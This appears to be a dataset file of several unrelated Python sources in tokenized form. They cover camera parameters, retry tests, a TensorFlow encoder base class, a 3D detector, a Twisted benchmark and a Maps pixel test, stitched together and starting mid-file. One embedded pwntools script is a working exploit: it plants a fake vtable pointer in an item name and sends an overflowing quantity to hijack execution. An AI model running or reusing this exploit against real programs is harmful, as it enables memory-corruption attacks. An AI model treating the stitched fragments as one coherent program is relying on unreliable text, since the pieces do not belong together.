parameters. kinect_id (int): Id of the target kinect. """<line_sep>name=kinect_id<line_sep>extrinsics_dict=smc_reader.get_kinect_color_extrinsics(kinect_id homogeneous=<false>)<line_sep>rot_np=extrinsics_dict['R']<line_sep>trans_np=extrinsics_dict['T']<line_sep>intrinsics_np=smc_reader.get_kinect_color_intrinsics(kinect_id)<line_sep>resolution=smc_reader.get_kinect_color_resolution(kinect_id)<line_sep>rmatrix=np.linalg.inv(rot_np).reshape(3 3)<line_sep>tvec=-np.dot(rmatrix trans_np)<line_sep>self.name=name<line_sep>self.set_mat_np('in_mat' intrinsics_np)<line_sep>self.set_mat_np('rotation_mat' rmatrix)<line_sep>self.set_value('translation' tvec.tolist())<line_sep>self.set_value('H' resolution[1])<line_sep>self.set_value('W' resolution[0])<block_end><def_stmt>load_iphone_from_smc self smc_reader iphone_id:int=0 frame_id:int=0<arrow><none><block_start>"""Load name and parameters of an iPhone from an SmcReader instance. Args: smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader): An SmcReader instance containing kinect camera parameters. iphone_id (int): Id of the target iphone. Defaults to 0. frame_id (int): Frame ID of one selected frame. It only influences the intrinsics. Defaults to 0. """<line_sep>name=f'iPhone_{iphone_id}'<line_sep>extrinsics_mat=smc_reader.get_iphone_extrinsics(iphone_id homogeneous=<true>)<line_sep>rot_np=extrinsics_mat[:3 :3]<line_sep>trans_np=extrinsics_mat[:3 3]<line_sep>intrinsics_np=smc_reader.get_iphone_intrinsics(iphone_id frame_id)<line_sep>resolution=smc_reader.get_iphone_color_resolution(iphone_id)<line_sep>rmatrix=np.linalg.inv(rot_np).reshape(3 3)<line_sep>tvec=-np.dot(rmatrix trans_np)<line_sep>self.name=name<line_sep>self.set_mat_np('in_mat' intrinsics_np)<line_sep>self.set_mat_np('rotation_mat' rmatrix)<line_sep>self.set_value('translation' tvec.tolist())<line_sep>self.set_value('H' resolution[1])<line_sep>self.set_value('W' resolution[0])<block_end>@classmethod<def_stmt>load_from_perspective_cameras cls cam name:str resolution:Union[List Tuple]=<none><block_start>"""Load parameters from a PerspectiveCameras and return a CameraParameter. Args: cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras): An instance. name (str): Name of this camera. """<assert_stmt>isinstance(cam PerspectiveCameras) 'Wrong input, support PerspectiveCameras only!'<if_stmt>len(cam)<g>1<block_start>warnings.warn('Will only use the first camera in the batch.')<block_end>cam=cam[0]<line_sep>resolution=resolution<if>resolution<is><not><none><else>cam.resolution[0].tolist()<line_sep>height,width=int(resolution[0]) int(resolution[1])<line_sep>cam_param=CameraParameter()<line_sep>cam_param.__init__(H=height W=width name=name)<line_sep>k_4x4=cam.K# shape (1, 4, 4) r_3x3=cam.R# shape (1, 3, 3) t_3=cam.T# shape (1, 3) is_perspective=cam.is_perspective()<line_sep>in_ndc=cam.in_ndc()<line_sep>k_4x4,r_3x3,t_3=convert_camera_matrix(K=k_4x4 R=r_3x3 T=t_3 is_perspective=<false> in_ndc_dst=<false> in_ndc_src=in_ndc convention_src='pytorch3d' convention_dst='opencv' resolution_src=(height width) resolution_dst=(height width))<line_sep>k_3x3=convert_K_4x4_to_3x3(k_4x4 is_perspective=is_perspective)<line_sep>k_3x3=k_3x3.numpy()[0]<line_sep>r_3x3=r_3x3.numpy()[0]<line_sep>t_3=t_3.numpy()[0]<line_sep>cam_param.name=name<line_sep>cam_param.set_mat_np('in_mat' k_3x3)<line_sep>cam_param.set_mat_np('rotation_mat' r_3x3)<line_sep>cam_param.set_value('translation' t_3.tolist())<line_sep>cam_param.parameters_dict.update(H=height)<line_sep>cam_param.parameters_dict.update(W=width)<line_sep><return>cam_param<block_end><def_stmt>export_to_perspective_cameras self<arrow>PerspectiveCameras<block_start>"""Export to a opencv defined screen space PerspectiveCameras. Returns: Same defined PerspectiveCameras of batch_size 1. """<line_sep>height=self.parameters_dict['H']<line_sep>width=self.parameters_dict['W']<line_sep>k_4x4,rotation,translation=self.get_KRT(k_dim=4)<line_sep>k_4x4=np.expand_dims(k_4x4 0)# shape (1, 3, 3) rotation=np.expand_dims(rotation 0)# shape (1, 3, 3) translation=np.expand_dims(translation 0)# shape (1, 3) new_K=torch.from_numpy(k_4x4)<line_sep>new_R=torch.from_numpy(rotation)<line_sep>new_T=torch.from_numpy(translation)<line_sep>cam=build_cameras(dict(type='PerspectiveCameras' K=new_K.float() R=new_R.float() T=new_T.float() convention='opencv' in_ndc=<false> resolution=(height width)))<line_sep><return>cam<block_end><def_stmt>validate_item self key:Any val:Any<arrow>List<block_start>"""Check whether the key and its value matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. val (Any): Value to the key. Raises: KeyError: key cannot be found in CameraParameter.SUPPORTED_KEYS. TypeError: Value's type doesn't match definition. Returns: key (Any): The input key. val (Any): The value casted into correct format. """<line_sep>self.__check_key__(key)<line_sep>formatted_val=self.__validate_value_type__(key val)<line_sep><return>key formatted_val<block_end><def_stmt>__check_key__ self key:Any<arrow><none><block_start>"""Check whether the key matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. Raises: KeyError: key cannot be found in CameraParameter.SUPPORTED_KEYS. """<if_stmt>key<not><in>self.__class__.SUPPORTED_KEYS<block_start>err_msg='Key check failed in CameraParameter:\n'<line_sep>err_msg<augadd>f'key={str(key)}\n'<line_sep><raise>KeyError(err_msg)<block_end><block_end><def_stmt>__validate_value_type__ self key:Any val:Any<arrow>Any<block_start>"""Check whether the type of value matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. val (Any): Value to the key. Raises: TypeError: Value is supported but doesn't match definition. Returns: val (Any): The value casted into correct format. """<line_sep>np_type_mapping={int:np.integer float:np.floating}<line_sep>supported_keys=self.__class__.SUPPORTED_KEYS<line_sep>validation_result=_TypeValidation.FAIL<line_sep>ret_val=<none><if_stmt>supported_keys[key]['type']<eq>int<or>supported_keys[key]['type']<eq>float<block_start>type_str=str(type(val))<line_sep>class_name=type_str.split('\'')[1]<if_stmt>type(val)<eq>self.__class__.SUPPORTED_KEYS[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val<block_end><elif_stmt>class_name.startswith('numpy')# a value is required, not array <block_start><if_stmt>np.issubdtype(type(val) np_type_mapping[supported_keys[key]['type']])<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val.astype(supported_keys[key]['type'])<block_end><elif_stmt>np.issubdtype(type(val) np.ndarray)<block_start>validation_result=_TypeValidation.ARRAY<block_end><block_end><elif_stmt>class_name.startswith('torch')# only one element tensors # can be converted to Python scalars <block_start><if_stmt>len(val.size())<eq>0<block_start>val_item=val.item()<if_stmt>type(val_item)<eq>supported_keys[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val_item<block_end><block_end><else_stmt><block_start>validation_result=_TypeValidation.ARRAY<block_end><block_end><block_end><else_stmt><block_start><if_stmt>type(val)<eq>self.__class__.SUPPORTED_KEYS[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val<block_end><block_end><if_stmt>validation_result<ne>_TypeValidation.MATCH<block_start>err_msg='Type check failed in CameraParameter:\n'<line_sep>err_msg<augadd>f'key={str(key)}\n'<line_sep>err_msg<augadd>f'type(val)={type(val)}\n'<if_stmt>validation_result<eq>_TypeValidation.ARRAY<block_start>err_msg<augadd>'A single value is expected, '+'neither an array nor a slice.\n'<block_end><raise>TypeError(err_msg)<block_end><return>ret_val<block_end><block_end><def_stmt>__parse_chessboard_param__ chessboard_camera_param name inverse=<true><block_start>"""Parse a dict loaded from chessboard file into another dict needed by CameraParameter. Args: chessboard_camera_param (dict): A dict loaded from json.load(chessboard_file). name (str): Name of this camera. inverse (bool, optional): Whether to inverse rotation and translation mat. Defaults to True. Returns: dict: A dict of parameters in CameraParameter.to_dict() format. """<line_sep>camera_param_dict={}<line_sep>camera_param_dict['H']=chessboard_camera_param['imgSize'][1]<line_sep>camera_param_dict['W']=chessboard_camera_param['imgSize'][0]<line_sep>camera_param_dict['in_mat']=chessboard_camera_param['K']<line_sep>camera_param_dict['k1']=0<line_sep>camera_param_dict['k2']=0<line_sep>camera_param_dict['k3']=0<line_sep>camera_param_dict['k4']=0<line_sep>camera_param_dict['k5']=0<line_sep>camera_param_dict['p1']=0<line_sep>camera_param_dict['p2']=0<line_sep>camera_param_dict['name']=name<line_sep>camera_param_dict['rotation']=chessboard_camera_param['R']<line_sep>camera_param_dict['translation']=chessboard_camera_param['T']<if_stmt>inverse<block_start>rmatrix=np.linalg.inv(np.array(camera_param_dict['rotation']).reshape(3 3))<line_sep>camera_param_dict['rotation']=rmatrix.tolist()<line_sep>tmatrix=np.array(camera_param_dict['translation']).reshape((3 1))<line_sep>tvec=-np.dot(rmatrix tmatrix)<line_sep>camera_param_dict['translation']=tvec.reshape((3)).tolist()<block_end><return>camera_param_dict<block_end>__distort_coefficient_names__=['k1' 'k2' 'k3' 'k4' 'k5' 'k6' 'p1' 'p2']<def_stmt>__zero_mat_list__ n=3<block_start>"""Return a zero mat in list format. Args: n (int, optional): Length of the edge. Defaults to 3. Returns: list: List[List[int]] """<line_sep>ret_list=[[0]<times>n<for>_ range(n)]<line_sep><return>ret_list<block_end>
# coding: utf-8 # Copyright 2017 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>unittest<import_from_stmt>dbnd._vendor.tenacity retry<import_from_stmt>dbnd._vendor.tenacity tornadoweb<import_from_stmt>dbnd._vendor.tenacity.tests.test_tenacity NoIOErrorAfterCount<import_from_stmt>tornado gen<import_from_stmt>tornado testing<line_sep>@retry@gen.coroutine<def_stmt>_retryable_coroutine thing<block_start><yield>gen.sleep(0.00001)<line_sep>thing.go()<block_end><class_stmt>TestTornado(testing.AsyncTestCase)<block_start>@testing.gen_test<def_stmt>test_retry self<block_start><assert_stmt>gen.is_coroutine_function(_retryable_coroutine)<line_sep>thing=NoIOErrorAfterCount(5)<line_sep><yield>_retryable_coroutine(thing)<assert_stmt>thing.counter<eq>thing.count<block_end><def_stmt>test_repr self<block_start>repr(tornadoweb.TornadoRetrying())<block_end><def_stmt>test_old_tornado self<block_start>old_attr=gen.is_coroutine_function<try_stmt><block_start><del_stmt>gen.is_coroutine_function<line_sep># is_coroutine_function was introduced in tornado 4.5; # verify that we don't *completely* fall over on old versions @retry<def_stmt>retryable thing<block_start><pass><block_end><block_end><finally_stmt><block_start>gen.is_coroutine_function=old_attr<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>pwn *<line_sep># Create item print('1')<line_sep>FUNC=0x701e40<line_sep>#FUNC = 0x41414141 + 0x18 vtable_ptr=FUNC-0x18<line_sep>print(p64(vtable_ptr)<times>8)# name - pointer to fake vtable print('bob')# description print('1.23')# price # Add item to basket print('4')<line_sep>print('1')# second item, added above print('288230376151711745')# quantity - (2**64 / 64) + 1 # Check out print('6')<line_sep>
# Copyright (c) 2018 NVIDIA Corporation <import_from_future_stmt> absolute_import division print_function<import_from_future_stmt> unicode_literals<import_stmt>abc<import_stmt>copy<import_stmt>six<import_stmt>tensorflow<as>tf<import_from_stmt>open_seq2seq.optimizers.mp_wrapper mp_regularizer_wrapper<import_from_stmt>open_seq2seq.utils.utils check_params cast_types<line_sep>@six.add_metaclass(abc.ABCMeta)<class_stmt>Encoder<block_start>"""Abstract class from which all encoders must inherit. """<line_sep>@staticmethod<def_stmt>get_required_params <block_start>"""Static method with description of required parameters. Returns: dict: Dictionary containing all the parameters that **have to** be included into the ``params`` parameter of the class :meth:`__init__` method. """<line_sep><return>{}<block_end>@staticmethod<def_stmt>get_optional_params <block_start>"""Static method with description of optional parameters. Returns: dict: Dictionary containing all the parameters that **can** be included into the ``params`` parameter of the class :meth:`__init__` method. """<line_sep><return>{'regularizer':<none> # any valid TensorFlow regularizer 'regularizer_params':dict 'initializer':<none> # any valid TensorFlow initializer 'initializer_params':dict 'dtype':[tf.float32 tf.float16 'mixed'] }<block_end><def_stmt>__init__ self params model name="encoder" mode='train'<block_start>"""Encoder constructor. Note that encoder constructors should not modify TensorFlow graph, all graph construction should happen in the :meth:`self._encode() <_encode>` method. Args: params (dict): parameters describing the encoder. All supported parameters are listed in :meth:`get_required_params`, :meth:`get_optional_params` functions. model (instance of a class derived from :class:`Model<models.model.Model>`): parent model that created this encoder. Could be None if no model access is required for the use case. name (str): name for encoder variable scope. mode (str): mode encoder is going to be run in. Could be "train", "eval" or "infer". Config parameters: * **initializer** --- any valid TensorFlow initializer. If no initializer is provided, model initializer will be used. * **initializer_params** (dict) --- dictionary that will be passed to initializer ``__init__`` method. * **regularizer** --- and valid TensorFlow regularizer. If no regularizer is provided, model regularizer will be used. * **regularizer_params** (dict) --- dictionary that will be passed to regularizer ``__init__`` method. * **dtype** --- model dtype. Could be either ``tf.float16``, ``tf.float32`` or "mixed". For details see :ref:`mixed precision training <mixed_precision>` section in docs. If no dtype is provided, model dtype will be used. """<line_sep>check_params(params self.get_required_params() self.get_optional_params())<line_sep>self._params=copy.deepcopy(params)<line_sep>self._model=model<if_stmt>'dtype'<not><in>self._params<block_start><if_stmt>self._model<block_start>self._params['dtype']=self._model.params['dtype']<block_end><else_stmt><block_start>self._params['dtype']=tf.float32<block_end><block_end>self._name=name<line_sep>self._mode=mode<line_sep>self._compiled=<false><block_end><def_stmt>encode self input_dict<block_start>"""Wrapper around :meth:`self._encode() <_encode>` method. Here name, initializer and dtype are set in the variable scope and then :meth:`self._encode() <_encode>` method is called. Args: input_dict (dict): see :meth:`self._encode() <_encode>` docs. Returns: see :meth:`self._encode() <_encode>` docs. """<if_stmt><not>self._compiled<block_start><if_stmt>'regularizer'<not><in>self._params<block_start><if_stmt>self._model<and>'regularizer'<in>self._model.params<block_start>self._params['regularizer']=copy.deepcopy(self._model.params['regularizer'])<line_sep>self._params['regularizer_params']=copy.deepcopy(self._model.params['regularizer_params'])<block_end><block_end><if_stmt>'regularizer'<in>self._params<block_start>init_dict=self._params.get('regularizer_params' {})<if_stmt>self._params['regularizer']<is><not><none><block_start>self._params['regularizer']=self._params['regularizer'](**init_dict)<block_end><if_stmt>self._params['dtype']<eq>'mixed'<block_start>self._params['regularizer']=mp_regularizer_wrapper(self._params['regularizer'] )<block_end><block_end><if_stmt>self._params['dtype']<eq>'mixed'<block_start>self._params['dtype']=tf.float16<block_end><block_end><if_stmt>'initializer'<in>self.params<block_start>init_dict=self.params.get('initializer_params' {})<line_sep>initializer=self.params['initializer'](**init_dict)<block_end><else_stmt><block_start>initializer=<none><block_end>self._compiled=<true><with_stmt>tf.variable_scope(self._name initializer=initializer dtype=self.params['dtype'])<block_start><return>self._encode(self._cast_types(input_dict))<block_end><block_end><def_stmt>_cast_types self input_dict<block_start>"""This function performs automatic cast of all inputs to encoder dtype. Args: input_dict (dict): dictionary passed to :meth:`self._encode() <_encode>` method. Returns: dict: same as input_dict, but with all Tensors cast to encoder dtype. """<line_sep><return>cast_types(input_dict self.params['dtype'])<block_end>@abc.abstractmethod<def_stmt>_encode self input_dict<block_start>"""This is the main function which should construct encoder graph. Typically, encoder will take raw input sequence as an input and produce some hidden representation as an output. Args: input_dict (dict): dictionary containing encoder inputs. If the encoder is used with :class:`models.encoder_decoder` class, ``input_dict`` will have the following content:: { "source_tensors": data_layer.input_tensors['source_tensors'] } Returns: dict: dictionary of encoder outputs. Return all necessary outputs. Typically this will be just:: { "outputs": outputs, "state": state, } """<line_sep><pass><block_end>@property<def_stmt>params self<block_start>"""Parameters used to construct the encoder (dictionary)."""<line_sep><return>self._params<block_end>@property<def_stmt>mode self<block_start>"""Mode encoder is run in."""<line_sep><return>self._mode<block_end>@property<def_stmt>name self<block_start>"""Encoder name."""<line_sep><return>self._name<block_end><block_end>
"""timeflux.nodes.sequence: generate a sequence"""<import_from_stmt>timeflux.core.node Node<class_stmt>Sequence(Node)<block_start><def_stmt>__init__ self<block_start>"""Generate a sequence"""<line_sep>self._current=0<block_end><def_stmt>update self<block_start>self.o.set([self._current])<line_sep>self._current<augadd>1<block_end><block_end>
<import_from_stmt>. utils<def_stmt>load_dataset task_name function_name test<block_start>"""Load a dataset for a task."""<line_sep>fun=utils.get_function(task_name "datasets" function_name)<line_sep><return>fun(test=test)<block_end><def_stmt>main args<block_start>"""Run the ``load`` subcommand."""<line_sep>adata=load_dataset(args.task args.name args.test)<line_sep>adata.write_h5ad(args.output)<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>progress.bar Bar<import_stmt>time<import_stmt>torch<import_from_stmt>src.lib.external.nms soft_nms<import_from_stmt>src.lib.models.decode ddd_decode<import_from_stmt>src.lib.models.utils flip_tensor<import_from_stmt>src.lib.utils.image get_affine_transform<import_from_stmt>src.lib.utils.post_process ddd_post_process<import_from_stmt>src.lib.utils.debugger Debugger<import_from_stmt>src.lib.utils.ddd_utils compute_box_3d project_to_image alpha2rot_y<import_from_stmt>src.lib.utils.ddd_utils draw_box_3d unproject_2d_to_3d<import_from_stmt>.base_detector BaseDetector<class_stmt>DddDetector(BaseDetector)<block_start><def_stmt>__init__ self opt<block_start>super(DddDetector self).__init__(opt)<line_sep>self.calib=np.array([[707.0493 0 604.0814 45.75831] [0 707.0493 180.5066 -0.3454157] [0 0 1. 0.004981016]] dtype=np.float32)<block_end><def_stmt>pre_process self image scale calib=<none><block_start>height,width=image.shape[0:2]<line_sep>inp_height,inp_width=self.opt.input_h self.opt.input_w<line_sep>c=np.array([width/2 height/2] dtype=np.float32)<if_stmt>self.opt.keep_res<block_start>s=np.array([inp_width inp_height] dtype=np.int32)<block_end><else_stmt><block_start>s=np.array([width height] dtype=np.int32)<block_end>trans_input=get_affine_transform(c s 0 [inp_width inp_height])<line_sep>resized_image=image#cv2.resize(image, (width, height)) inp_image=cv2.warpAffine(resized_image trans_input (inp_width inp_height) flags=cv2.INTER_LINEAR)<line_sep>inp_image=(inp_image.astype(np.float32)/255.)<line_sep>inp_image=(inp_image-self.mean)/self.std<line_sep>images=inp_image.transpose(2 0 1)[np.newaxis <ellipsis>]<line_sep>calib=np.array(calib dtype=np.float32)<if>calib<is><not><none><else>self.calib<line_sep>images=torch.from_numpy(images)<line_sep>meta={'c':c 's':s 'out_height':inp_height<floordiv>self.opt.down_ratio 'out_width':inp_width<floordiv>self.opt.down_ratio 'calib':calib}<line_sep><return>images meta<block_end><def_stmt>process self images return_time=<false><block_start><with_stmt>torch.no_grad()<block_start>torch.cuda.synchronize()<line_sep>output=self.model(images)[-1]<line_sep>output['hm']=output['hm'].sigmoid_()<line_sep>output['dep']=1./(output['dep'].sigmoid()+1e-6)-1.<line_sep>wh=output['wh']<if>self.opt.reg_bbox<else><none><line_sep>reg=output['reg']<if>self.opt.reg_offset<else><none><line_sep>torch.cuda.synchronize()<line_sep>forward_time=time.time()<line_sep>dets=ddd_decode(output['hm'] output['rot'] output['dep'] output['dim'] wh=wh reg=reg K=self.opt.K)<block_end><if_stmt>return_time<block_start><return>output dets forward_time<block_end><else_stmt><block_start><return>output dets<block_end><block_end><def_stmt>post_process self dets meta scale=1<block_start>dets=dets.detach().cpu().numpy()<line_sep>detections=ddd_post_process(dets.copy() [meta['c']] [meta['s']] [meta['calib']] self.opt)<line_sep>self.this_calib=meta['calib']<line_sep><return>detections[0]<block_end><def_stmt>merge_outputs self detections<block_start>results=detections[0]<for_stmt>j range(1 self.num_classes+1)<block_start><if_stmt>len(results[j]<g>0)<block_start>keep_inds=(results[j][: -1]<g>self.opt.peak_thresh)<line_sep>results[j]=results[j][keep_inds]<block_end><block_end><return>results<block_end><def_stmt>debug self debugger images dets output scale=1<block_start>dets=dets.detach().cpu().numpy()<line_sep>img=images[0].detach().cpu().numpy().transpose(1 2 0)<line_sep>img=((img<times>self.std+self.mean)<times>255).astype(np.uint8)<line_sep>pred=debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())<line_sep>debugger.add_blend_img(img pred 'pred_hm')<line_sep>debugger.add_ct_detection(img dets[0] show_box=self.opt.reg_bbox center_thresh=self.opt.vis_thresh img_id='det_pred')<block_end><def_stmt>show_results self debugger image results<block_start>debugger.add_3d_detection(image results self.this_calib center_thresh=self.opt.vis_thresh img_id='add_pred')<line_sep>debugger.add_bird_view(results center_thresh=self.opt.vis_thresh img_id='bird_pred')<line_sep>debugger.show_all_imgs(pause=self.pause)<block_end><block_end>
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Benchmarks comparing the write performance of a "normal" Protocol instance and an instance of a Protocol class which has had L{twisted.conch.mixin}'s L{BufferingMixin<twisted.conch.mixin.BufferingMixin>} mixed in to perform Nagle-like write coalescing. """<import_from_stmt>pprint pprint<import_from_stmt>sys stdout<import_from_stmt>time time<import_from_stmt>twisted.conch.mixin BufferingMixin<import_from_stmt>twisted.internet reactor<import_from_stmt>twisted.internet.defer Deferred<import_from_stmt>twisted.internet.protocol ClientCreator Protocol ServerFactory<import_from_stmt>twisted.python.log startLogging<import_from_stmt>twisted.python.usage Options<class_stmt>BufferingBenchmark(Options)<block_start>""" Options for configuring the execution parameters of a benchmark run. """<line_sep>optParameters=[("scale" "s" "1" "Work multiplier (bigger takes longer, might resist noise better)" )]<def_stmt>postOptions self<block_start>self["scale"]=int(self["scale"])<block_end><block_end><class_stmt>ServerProtocol(Protocol)<block_start>""" A silent protocol which only waits for a particular amount of input and then fires a Deferred. """<def_stmt>__init__ self expected finished<block_start>self.expected=expected<line_sep>self.finished=finished<block_end><def_stmt>dataReceived self bytes<block_start>self.expected<augsub>len(bytes)<if_stmt>self.expected<eq>0<block_start>finished,self.finished=self.finished <none><line_sep>finished.callback(<none>)<block_end><block_end><block_end><class_stmt>BufferingProtocol(Protocol BufferingMixin)<block_start>""" A protocol which uses the buffering mixin to provide a write method. """<block_end><class_stmt>UnbufferingProtocol(Protocol)<block_start>""" A protocol which provides a naive write method which simply passes through to the transport. """<def_stmt>connectionMade self<block_start>""" Bind write to the transport's write method and flush to a no-op function in order to provide the same API as is provided by BufferingProtocol. """<line_sep>self.write=self.transport.write<line_sep>self.flush=<lambda>:<none><block_end><block_end><def_stmt>_write proto byteCount<block_start>write=proto.write<line_sep>flush=proto.flush<for_stmt>i range(byteCount)<block_start>write("x")<block_end>flush()<block_end><def_stmt>_benchmark byteCount clientProtocol<block_start>result={}<line_sep>finished=Deferred()<def_stmt>cbFinished ignored<block_start>result["disconnected"]=time()<line_sep>result["duration"]=result["disconnected"]-result["connected"]<line_sep><return>result<block_end>finished.addCallback(cbFinished)<line_sep>f=ServerFactory()<line_sep>f.protocol=<lambda>:ServerProtocol(byteCount finished)<line_sep>server=reactor.listenTCP(0 f)<line_sep>f2=ClientCreator(reactor clientProtocol)<line_sep>proto=f2.connectTCP("127.0.0.1" server.getHost().port)<def_stmt>connected proto<block_start>result["connected"]=time()<line_sep><return>proto<block_end>proto.addCallback(connected)<line_sep>proto.addCallback(_write byteCount)<line_sep><return>finished<block_end><def_stmt>_benchmarkBuffered byteCount<block_start><return>_benchmark(byteCount BufferingProtocol)<block_end><def_stmt>_benchmarkUnbuffered byteCount<block_start><return>_benchmark(byteCount UnbufferingProtocol)<block_end><def_stmt>benchmark scale=1<block_start>""" Benchmark and return information regarding the relative performance of a protocol which does not use the buffering mixin and a protocol which does. @type scale: C{int} @param scale: A multiplier to the amount of work to perform @return: A Deferred which will fire with a dictionary mapping each of the two unicode strings C{u'buffered'} and C{u'unbuffered'} to dictionaries describing the performance of a protocol of each type. These value dictionaries will map the unicode strings C{u'connected'} and C{u'disconnected'} to the times at which each of those events occurred and C{u'duration'} two the difference between these two values. """<line_sep>overallResult={}<line_sep>byteCount=1024<line_sep>bufferedDeferred=_benchmarkBuffered(byteCount<times>scale)<def_stmt>didBuffered bufferedResult<block_start>overallResult["buffered"]=bufferedResult<line_sep>unbufferedDeferred=_benchmarkUnbuffered(byteCount<times>scale)<def_stmt>didUnbuffered unbufferedResult<block_start>overallResult["unbuffered"]=unbufferedResult<line_sep><return>overallResult<block_end>unbufferedDeferred.addCallback(didUnbuffered)<line_sep><return>unbufferedDeferred<block_end>bufferedDeferred.addCallback(didBuffered)<line_sep><return>bufferedDeferred<block_end><def_stmt>main args=<none><block_start>""" Perform a single benchmark run, starting and stopping the reactor and logging system as necessary. """<line_sep>startLogging(stdout)<line_sep>options=BufferingBenchmark()<line_sep>options.parseOptions(args)<line_sep>d=benchmark(options["scale"])<def_stmt>cbBenchmark result<block_start>pprint(result)<block_end><def_stmt>ebBenchmark err<block_start>print(err.getTraceback())<block_end>d.addCallbacks(cbBenchmark ebBenchmark)<def_stmt>stopReactor ign<block_start>reactor.stop()<block_end>d.addBoth(stopReactor)<line_sep>reactor.run()<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Runs a Google Maps pixel test. Performs several common navigation actions on the map (pan, zoom, rotate) then captures a screenshot and compares selected pixels against expected values"""<import_stmt>json<import_stmt>optparse<import_stmt>os<import_stmt>cloud_storage_test_base<import_stmt>maps_expectations<import_from_stmt>telemetry test<import_from_stmt>telemetry.core bitmap<import_from_stmt>telemetry.core util<import_from_stmt>telemetry.page page_test<import_from_stmt>telemetry.page page_set<class_stmt>MapsValidator(cloud_storage_test_base.ValidatorBase)<block_start><def_stmt>__init__ self<block_start>super(MapsValidator self).__init__('ValidatePage')<block_end><def_stmt>CustomizeBrowserOptions self options<block_start>options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')<block_end><def_stmt>ValidatePage self page tab results# TODO: This should not be necessary, but it's not clear if the test is # failing on the bots in it's absence. Remove once we can verify that it's # safe to do so. <block_start>MapsValidator.SpinWaitOnRAF(tab 3)<if_stmt><not>tab.screenshot_supported<block_start><raise>page_test.Failure('Browser does not support screenshot capture')<block_end>screenshot=tab.Screenshot(5)<if_stmt><not>screenshot<block_start><raise>page_test.Failure('Could not capture screenshot')<block_end>dpr=tab.EvaluateJavaScript('window.devicePixelRatio')<line_sep>expected=self._ReadPixelExpectations(page)<try_stmt><block_start>self._CompareToExpectations(screenshot expected dpr)<block_end><except_stmt>page_test.Failure<block_start>image_name=self._UrlToImageName(page.display_name)<if_stmt>self.options.test_machine_name<block_start>self._UploadErrorImagesToCloudStorage(image_name screenshot <none>)<block_end><else_stmt><block_start>self._WriteErrorImages(self.options.generated_dir image_name screenshot <none>)<block_end><raise><block_end><block_end>@staticmethod<def_stmt>SpinWaitOnRAF tab iterations timeout=60<block_start>waitScript=r""" window.__spinWaitOnRAFDone = false; var iterationsLeft = %d; function spin() { iterationsLeft--; if (iterationsLeft == 0) { window.__spinWaitOnRAFDone = true; return; } window.requestAnimationFrame(spin); } window.requestAnimationFrame(spin); """%iterations<def_stmt>IsWaitComplete <block_start><return>tab.EvaluateJavaScript('window.__spinWaitOnRAFDone')<block_end>tab.ExecuteJavaScript(waitScript)<line_sep>util.WaitFor(IsWaitComplete timeout)<block_end><def_stmt>_ReadPixelExpectations self page<block_start>expectations_path=os.path.join(page._base_dir page.pixel_expectations)<with_stmt>open(expectations_path 'r')<as>f<block_start>json_contents=json.load(f)<block_end><return>json_contents<block_end><def_stmt>_CompareToExpectations self screenshot expectations devicePixelRatio<block_start><for_stmt>expectation expectations<block_start>location=expectation["location"]<line_sep>x=location[0]<times>devicePixelRatio<line_sep>y=location[1]<times>devicePixelRatio<if_stmt>x<l>0<or>y<l>0<or>x<g>screenshot.width<or>y<g>screenshot.height<block_start><raise>page_test.Failure('Expected pixel location [%d, %d] is out of range on [%d, %d] image'%(x y screenshot.width screenshot.height))<block_end>pixel_color=screenshot.GetPixelColor(x y)<line_sep>expect_color=bitmap.RgbaColor(expectation["color"][0] expectation["color"][1] expectation["color"][2])<line_sep>iter_result=pixel_color.IsEqual(expect_color expectation["tolerance"])<if_stmt><not>iter_result<block_start><raise>page_test.Failure('Expected pixel at '+str(location)+' to be '+str(expectation["color"])+" but got ["+str(pixel_color.r)+", "+str(pixel_color.g)+", "+str(pixel_color.b)+"]")<block_end><block_end><block_end><block_end><class_stmt>Maps(cloud_storage_test_base.TestBase)<block_start>"""Google Maps pixel tests."""<line_sep>test=MapsValidator<line_sep>@staticmethod<def_stmt>AddTestCommandLineOptions parser<block_start>group=optparse.OptionGroup(parser 'Maps test options')<line_sep>cloud_storage_test_base.TestBase._AddTestCommandLineOptions(parser group)<line_sep>parser.add_option_group(group)<block_end><def_stmt>CreateExpectations self page_set<block_start><return>maps_expectations.MapsExpectations()<block_end><def_stmt>CreatePageSet self options<block_start>page_set_path=os.path.join(util.GetChromiumSrcDir() 'content' 'test' 'gpu' 'page_sets')<line_sep>page_set_dict={'archive_data_file':'data/maps.json' 'make_javascript_deterministic':<false> 'pages':[{'name':'Maps.maps_001' 'url':'http://localhost:10020/tracker.html' # TODO: Hack to prevent maps from scaling due to window size. # Remove when the maps team provides a better way of overriding this # behavior 'script_to_evaluate_on_commit':'window.screen = null;' 'navigate_steps':[{'action':'navigate'} {'action':'wait' 'javascript':'window.testDone'}] 'pixel_expectations':'data/maps_001_expectations.json'}]}<line_sep><return>page_set.PageSet.FromDict(page_set_dict page_set_path)<block_end><block_end>
